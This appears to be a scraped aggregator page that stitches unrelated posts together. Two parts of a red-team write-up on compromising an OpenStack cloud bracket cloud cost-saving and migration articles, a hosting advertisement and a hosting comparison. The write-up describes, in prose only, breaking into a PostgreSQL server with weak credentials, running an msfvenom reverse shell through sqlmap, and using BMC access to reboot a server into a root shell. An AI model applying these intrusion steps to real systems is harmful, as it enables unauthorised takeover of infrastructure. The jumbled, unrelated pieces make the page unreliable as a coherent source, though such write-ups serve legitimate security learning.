In this write up we’ll see how we were able to combine direct sqlmap connection to a database with BMC/IPMI exploitation to compromise a big cloud-hosted client.
A couple of years ago, our team was tasked with performing an infrastructure pentest in an Openstack network. It was formed by about 2000 physical servers, hosting over 25K virtual instances. We started the pentest located in a small subnet which didn’t have a lot of outbound traffic allowed. After a quick Nmap scan, we weren’t able to find any simple vulnerabilities to exploit, so we started looking into the services available to us. Amongst them, we found an exposed PostgreSQL server, hosted in a development server. After creating a custom wordlist with multiple derivations of the company’s name, we were able to login with relatively trivial credentials. The username was Postgres, and to protect this company’s anonymity, let’s say that the password was “admin”.
We proceeded to use sqlmap (https://github.com/sqlmapproject/sqlmap). This tool was created to exploit SQL injections, but it can also give you several options when establishing a direct connection to the database (when you have the credentials). One of these options is starting a command shell on the exploited database.
After testing the shell, we decided to put together a custom payload in order to receive a reverse shell, toy work more comfortably.
To do this, we started assembling a payload with msfvenom. In this case, the payload was a reverse TCP shell, for an x64 Linux machine (you can see that we had to select the DB architecture on the previous image).
Putting together the payload with msfvenom
An advantage of using this payload is that you can receive the connect back with a simple Netcat. Most other payloads require something like Metasploit’s exploit/multi/handler module to receive the reverse connection.
After running the payload with the sqlmap shell, we got our connection from the server.
#security #infosec #pentesting #red-team #devops #cloud
A multi-cloud approach is nothing but leveraging two or more cloud platforms for meeting the various business requirements of an enterprise. The multi-cloud IT environment incorporates different clouds from multiple vendors and negates the dependence on a single public cloud service provider. Thus enterprises can choose specific services from multiple public clouds and reap the benefits of each.
Given its affordability and agility, most enterprises opt for a multi-cloud approach in cloud computing now. A 2018 survey on the public cloud services market points out that 81% of the respondents use services from two or more providers. Subsequently, the cloud computing services market has reported incredible growth in recent times. The worldwide public cloud services market is all set to reach $500 billion in the next four years, according to IDC.
By choosing multi-cloud solutions strategically, enterprises can optimize the benefits of cloud computing and aim for some key competitive advantages. They can avoid the lengthy and cumbersome processes involved in buying, installing and testing high-priced systems. The IaaS and PaaS solutions have become a windfall for the enterprise’s budget as it does not incur huge up-front capital expenditure.
However, cost optimization is still a challenge while facilitating a multi-cloud environment and a large number of enterprises end up overpaying with or without realizing it. The below-mentioned tips would help you ensure the money is spent wisely on cloud computing services.
Most organizations tend to get wrong with simple things which turn out to be the root cause for needless spending and resource wastage. The first step to cost optimization in your cloud strategy is to identify underutilized resources that you have been paying for.
Enterprises often continue to pay for resources that have been purchased earlier but are no longer useful. Identifying such unused and unattached resources and deactivating it on a regular basis brings you one step closer to cost optimization. If needed, you can deploy automated cloud management tools that are largely helpful in providing the analytics needed to optimize the cloud spending and cut costs on an ongoing basis.
Another key cost optimization strategy is to identify the idle computing instances and consolidate them into fewer instances. An idle computing instance may require a CPU utilization level of 1-5%, but you may be billed by the service provider for 100% for the same instance.
Every enterprise will have such non-production instances that constitute unnecessary storage space and lead to overpaying. Re-evaluating your resource allocations regularly and removing unnecessary storage may help you save money significantly. Resource allocation is not only a matter of CPU and memory but also it is linked to the storage, network, and various other factors.
The key to efficient cost reduction in cloud computing technology lies in proactive monitoring. A comprehensive view of the cloud usage helps enterprises to monitor and minimize unnecessary spending. You can make use of various mechanisms for monitoring computing demand.
For instance, you can use a heatmap to understand the highs and lows in computing visually. This heat map indicates the start and stop times which in turn lead to reduced costs. You can also deploy automated tools that help organizations to schedule instances to start and stop. By following a heatmap, you can understand whether it is safe to shut down servers on holidays or weekends.
#cloud computing services #all #hybrid cloud #cloud #multi-cloud strategy #cloud spend #multi-cloud spending #multi cloud adoption #why multi cloud #multi cloud trends #multi cloud companies #multi cloud research #multi cloud market
The moving of applications, databases and other business elements from the local server to the cloud server called cloud migration. This article will deal with migration techniques, requirement and the benefits of cloud migration.
In simple terms, moving from local to the public cloud server is called cloud migration. Gartner says 17.5% revenue growth as promised in cloud migration and also has a forecast for 2022 as shown in the following image.
#cloud computing services #cloud migration #all #cloud #cloud migration strategy #enterprise cloud migration strategy #business benefits of cloud migration #key benefits of cloud migration #benefits of cloud migration #types of cloud migration
We strive to provide every customer business with google cloud hosting web services and managed series that are entirely personalized around the commercial and development goals of the company in USA. Businesses that work with us will see a marked improvement in efficiency. Managed Google Cloud Platform services from SISGAIN helps organisations leverage this relative newcomer’s big data and machine learning capabilities via our team of approachable experts. From solution design to in-life support we take the operational burden off dev and product development teams. For more information call us at +18444455767 or email us at firstname.lastname@example.org
#google cloud platform services #google cloud hosting web services #google cloud web hosting #gcp web hosting #google cloud server hosting #google vps hosting
Hosting a website these days has boiled down to picking between two major options: Cloud Hosting and Dedicated Hosting.
Naturally, there are also shared hosting and virtual private server platforms but any website owner with half a decent knowledge of web hosting knows that cloud and dedicated hosting are unbeatable options for the practical purposes of scalability and uptime guarantee.
There has never been a better time to build a website. With the fluid options made accessible by cloud platforms that can integrate custom dedicated server capabilities, small businesses can now optimize enterprise-grade features that are still within their budget range.
Some hosting providers and website builders like Wix even provide free web hosting to clients without compromising standard industry features like website security and optimal uptime guarantee.
It is often a debate for any serious website owner as to whether to use a cloud hosting option or to go with a dedicated server. Both options have their advantages and would guarantee website stability, a fast loading speed for high website traffic, vast compatibility options for software and applications, and data security.
But both platforms do have their differences and specifics to the optimal solutions they provide. The avant-garde nature of cloud hosting plans is however closing this gap and we’re getting closer to a world where complex custom web server requirements can be provided by cloud solutions.
We won’t be able to fully understand the advantages that flexible cloud solutions have over dedicated servers without first understanding the dynamics of both platforms.
#web-hosting #cloud-web-hosting #cloud hosting #cloud
On part 1 we briefly explained how we got administrator privileges to almost all BMC devices hosting a native Openstack cloud. In this part we’ll show how we used these to achieve complete compromise.
If you’ve read up on BMC devices, by now you’ll know that they allow you to
the attached devices. This is great and all, but they only simulate physical access to the server, you still need to get inside. Yes, you could DOS them by shutting them down, but we thought that this wasn’t enough, so we kept digging.
One of the most common ways of compromising an equipment having physical address is rebooting it and manipulating the startup in order to come up with a root shell. You can do this in Unix, Mac and Windows as well.
The caveat of this approach is that each server was usually hosting about 2000 virtual hosts each. So we needed to find a server that wasn’t in use. The plan was to shut it down (or only starting it up, if it was already down) and edit the startup to give us root access. After that, we wanted to take a look at the configuration to find any mistakes / useful data that would allow us to compromise other servers as well.
Openstack allows you to query the local infrastructure and request certain parameters. One of these is the state of the instance, which in this local company’s case, was define as the availability of the instance (white / blacklisted to receive traffic) + the running state (up / down).
We needed to find a blacklisted server (the running state didn’t matter). We managed to find one with disk issues which was down. Luckily, we were able to boot, with the difficulty of having certain parts of the filesystem in read only mode.
Querying openstack for the appropriate server to compromise
Once we found it, we logged in with the previously cracked credentials.
Using the credentials obtained on part 1
#red-team #devops #infosec #pentesting #security #cloud